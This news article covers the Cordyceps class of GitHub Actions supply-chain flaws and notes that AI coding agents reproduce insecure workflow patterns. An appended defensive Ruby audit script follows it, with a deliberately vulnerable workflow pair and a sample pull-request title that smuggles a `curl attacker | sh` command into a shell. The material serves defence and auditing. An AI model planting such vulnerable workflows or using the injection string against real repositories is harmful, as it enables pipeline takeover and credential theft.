
Cordyceps Supply Chain Flaw Impacting Code Repositories at Thousands of Organizations





Cyber Security News · By Tushar Subhra Dutta · June 23, 2026

A newly discovered supply chain flaw is putting thousands of organizations at serious risk. Named Cordyceps after the parasitic fungus known for taking over its hosts, this critical class of vulnerability quietly burrows into software development pipelines and gives attackers full control of code repositories at some of the biggest companies in the world.

The flaw targets CI/CD workflows, the automated pipelines developers use to build, test, and release software. These workflows run shell commands, hold signing keys, authenticate to cloud providers, and publish releases. Yet they are widely treated as simple configuration files rather than security-critical code. That gap in perception is exactly what Cordyceps exploits.

Researchers at Novee identified this systemic class of exploitable vulnerabilities across the open-source supply chain, noting patterns of command injection, broken authentication logic, artifact poisoning chains, and privilege escalation in GitHub Actions workflows. Novee said in a report shared with Cyber Security News (CSN) that the team scanned roughly 30,000 high-impact repositories and confirmed hundreds of fully exploitable attack chains.

What makes this discovery alarming is not just the technical depth of the flaw but its accessibility. Anyone with a free GitHub account can exploit it, with no special privileges or organizational membership. A single pull request, or even a comment on one, can be enough to trigger the chain and hand an outsider full control of a project's build pipeline.

The downstream reach is enormous. When one compromised repository supplies software that thousands of organizations depend on, a single attack can ripple outward into banks, cloud environments, AI labs, and end-user devices. Fixes have been confirmed at major organizations including Microsoft, Google, Apache, Cloudflare, and the Python Software Foundation.

Cordyceps Supply Chain Flaw

The most dangerous aspect of Cordyceps is how it hides in plain sight. The exploit chains are multi-step, meaning no single piece looks dangerous on its own. An untrusted pull request triggers a low-privilege workflow, whose output flows into a high-privilege workflow, which then authenticates to a cloud environment with the highest possible permissions. Every step appears normal, but the combination creates a clear path to full control.

This is what makes the vulnerability so hard to catch with traditional security scanners. Standard tools check single files for known patterns, but the risk in Cordyceps exists only in how multiple workflows interact with each other. A scanner sees valid YAML configuration. An attacker sees a four-step chain leading to permanent credential access.

Novee confirmed that over 300 repositories were fully exploitable. In Microsoft's Azure Sentinel, a comment on a pull request was enough for an attacker to steal a non-expiring GitHub App key. For Google's AI Agent Development Kit, a single pull request could hand an attacker the highest Google Cloud role. In Apache's Doris, two zero-click attack paths were confirmed, both leading to credential theft and direct code modification rights.

AI Is Compounding the Problem at Scale

One of the most troubling findings in the Cordyceps research is the role AI coding agents are playing in spreading the flaw. As developers rely more heavily on AI tools to generate CI/CD configuration files quickly, those tools reproduce the same insecure patterns over and over. The result is the same class of vulnerability being quietly planted across potentially millions of repositories. Novee's team pulled data across the npm, PyPI, crates.io, and Go ecosystems and flagged 654 repositories in a single scan.

The proven impact covered the full build and release pipeline, touching everything from code pushes to protected branches to credential theft across AWS, GCP, and Netlify. Organizations that run software on GitHub, or depend on open-source projects that do, are urged to assess their exposure.

The fix, once the chain is identified, is straightforward. Security teams should treat workflow code with the same rigor as application code, conduct cross-workflow audits, and ensure that trust boundaries between low-privilege and high-privilege workflows cannot be crossed by untrusted inputs such as pull request titles, branch names, or comment bodies.

Tushar Subhra Dutta is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
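The chain and the cross-workflow audit described above, as an added example that is not part of the article and not Novee's scanner: a Ruby script (Ruby's standard-library YAML is used so it runs offline) that loads a set of workflow files, flags any `run:` step that interpolates an attacker-controlled context such as the pull request title, and then follows `workflow_run` edges to find a low-privilege producer whose artifact lands in a consumer holding write permissions or secrets. The workflow names, the list of untrusted contexts and the three workflow documents are constructed for the example. `actions/download-artifact@v4` does require `run-id` and `github-token` when it pulls another run's artifact, which is why the consumer references `secrets.GITHUB_TOKEN` and why that one secret, whose rights are bounded by the `permissions:` block, is exempt from the privilege check.

```ruby
# Added example, not Novee's scanner or any project's code: a small cross-workflow audit for
# GitHub Actions flagging (1) untrusted event data interpolated into a run: script (shell command
# injection) and (2) a pull_request/issue_comment workflow whose artifact feeds a workflow_run
# workflow that holds write permissions or secrets. All workflow YAML here is constructed.
require 'yaml'

# Contexts an outside contributor controls (assumption: illustrative, not exhaustive).
UNTRUSTED = %w[github.event.pull_request.title github.event.pull_request.body
               github.event.pull_request.head.ref github.event.pull_request.head.repo.full_name
               github.event.issue.title github.event.issue.body github.event.comment.body
               github.head_ref github.event.workflow_run.head_branch].freeze
LOW_PRIV_TRIGGERS = %w[pull_request issue_comment].freeze

# Psych follows YAML 1.1, so an unquoted `on:` key loads as the boolean true, not the string "on".
def on_block(wf); wf['on'] || wf[true]; end
def triggers(wf)
  on = on_block(wf)
  on.is_a?(Hash) ? on.keys : Array(on)
end
def steps(wf)
  (wf['jobs'] || {}).flat_map { |job, spec| (spec['steps'] || []).map { |s| [job, s] } }
end

# Pattern 1: untrusted context inside ${{ }} in a run: script. Fix: pass it via env: and quote "$VAR".
def injection_findings(wf)
  steps(wf).flat_map do |job, step|
    next [] unless (script = step['run'])
    script.scan(/\$\{\{\s*([^}]+?)\s*\}\}/).flatten
          .select { |expr| UNTRUSTED.any? { |ctx| expr.include?(ctx) } }
          .map { |expr| "#{wf['name']}: job '#{job}' interpolates untrusted #{expr} into run:" }
  end
end
def downloads_artifact?(wf)
  steps(wf).any? { |_, s| s['uses'].to_s.start_with?('actions/download-artifact') }
end

# Write permissions anywhere, or any secret beyond GITHUB_TOKEN (whose rights permissions: already bounds).
def privileged?(wf)
  perms = [wf['permissions']] + (wf['jobs'] || {}).values.map { |j| j['permissions'] }
  write = perms.any? { |p| p == 'write-all' || (p.is_a?(Hash) && p.values.include?('write')) }
  write || wf.to_s.scan(/secrets\.(\w+)/).flatten.any? { |s| s != 'GITHUB_TOKEN' }
end

# Pattern 2: a workflow_run consumer pulls an artifact built under a low-privilege trigger, then acts with privilege.
def chain_findings(workflows)
  by_name = workflows.to_h { |wf| [wf['name'], wf] }
  workflows.flat_map do |consumer|
    wr = (on = on_block(consumer)).is_a?(Hash) ? on['workflow_run'] : nil
    next [] unless wr.is_a?(Hash)
    Array(wr['workflows']).filter_map do |pname|
      producer = by_name[pname]
      next unless producer && (triggers(producer) & LOW_PRIV_TRIGGERS).any?
      next unless downloads_artifact?(consumer) && privileged?(consumer)
      "'#{pname}' (#{triggers(producer).join('/')}) -> '#{consumer['name']}' (workflow_run): untrusted artifact reaches privilege"
    end
  end
end
def audit(yaml_docs)
  workflows = yaml_docs.map { |doc| YAML.safe_load(doc) }
  workflows.flat_map { |wf| injection_findings(wf) } + chain_findings(workflows)
end

# Constructed vulnerable pair: PR title echoed into a shell; its artifact consumed by a privileged deploy.
VULN_PR_BUILD = <<~'YAML'
  name: PR Build
  on: [pull_request]
  jobs:
    build:
      runs-on: ubuntu-latest
      steps:
        - run: echo "${{ github.event.pull_request.title }}" > pr.txt
        - uses: actions/upload-artifact@v4
          with: { name: pr-meta, path: pr.txt }
YAML
VULN_DEPLOY = <<~'YAML'
  name: Deploy Preview
  on: { workflow_run: { workflows: [PR Build], types: [completed] } }
  permissions: { contents: write, id-token: write }
  jobs:
    deploy:
      runs-on: ubuntu-latest
      steps:
        - uses: actions/download-artifact@v4
          with:
            name: pr-meta
            run-id: ${{ github.event.workflow_run.id }}
            github-token: ${{ secrets.GITHUB_TOKEN }}
        - run: ./deploy.sh "${{ secrets.DEPLOY_KEY }}" "$(cat pr.txt)"
YAML
# Hardened producer: the title reaches the shell only through env:, never through ${{ }} inside run:.
SAFE_PR_BUILD = <<~'YAML'
  name: PR Build
  on: [pull_request]
  jobs:
    build:
      runs-on: ubuntu-latest
      steps:
        - env:
            PR_TITLE: ${{ github.event.pull_request.title }}
          run: printf '%s\n' "$PR_TITLE" > pr.txt
YAML
puts audit([VULN_PR_BUILD, VULN_DEPLOY]) if __FILE__ == $0
```

Running it prints the two findings for the vulnerable pair: the `run:` step that expands the PR title (a title containing `"; curl attacker | sh; echo "` becomes shell code), and the `PR Build -> Deploy Preview` edge. Swapping in the hardened producer removes the injection finding but, deliberately, not the chain finding: the artifact still originates from an untrusted run, and whether the consumer validates it enough is exactly the question a human reviewer of the chain has to answer. The check is narrow by design (it inspects `run:` scripts only, not script inputs of other actions), and the `on_block` helper exists because Psych's YAML 1.1 boolean handling of an unquoted `on:` key is a real pitfall for anyone writing such a scanner in Ruby.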